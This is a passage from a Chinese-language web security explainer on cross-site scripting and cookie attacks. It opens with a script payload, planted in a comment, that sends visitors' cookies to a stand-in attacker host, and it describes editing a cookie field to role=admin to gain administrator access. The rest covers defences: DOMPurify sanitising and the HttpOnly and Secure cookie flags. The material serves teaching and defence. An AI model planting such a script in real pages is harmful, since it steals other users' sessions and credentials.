<script>var xhr = new XMLHttpRequest();xhr.open('GET', 'http://attacker - site.com/?cookies=' + encodeURIComponent(document.cookie), true);xhr.send();</script>
。当其他用户浏览包含此评论的页面时,浏览器会执行这个脚本,将用户的Cookies信息发送到攻击者的服务器(http://attacker - site.com
)。role=admin
,攻击者将自己的Cookies中的这个字段修改为role=admin
,从而试图获取管理员权限对应的资源。DOMPurify.sanitize(user_comment)
来净化评论内容,去除可能的恶意脚本。HttpOnly
和Secure
属性。HttpOnly
属性可以防止JavaScript脚本访问Cookies,降低XSS攻击导致Cookies泄露和被修改的风险。Secure
属性则确保Cookies只有在通过HTTPS协议传输时才会发送,避免在不安全的网络环境下被窃取。例如,在设置Cookies时,使用Set - Cookie: session_id=123456789; HttpOnly; Secure
。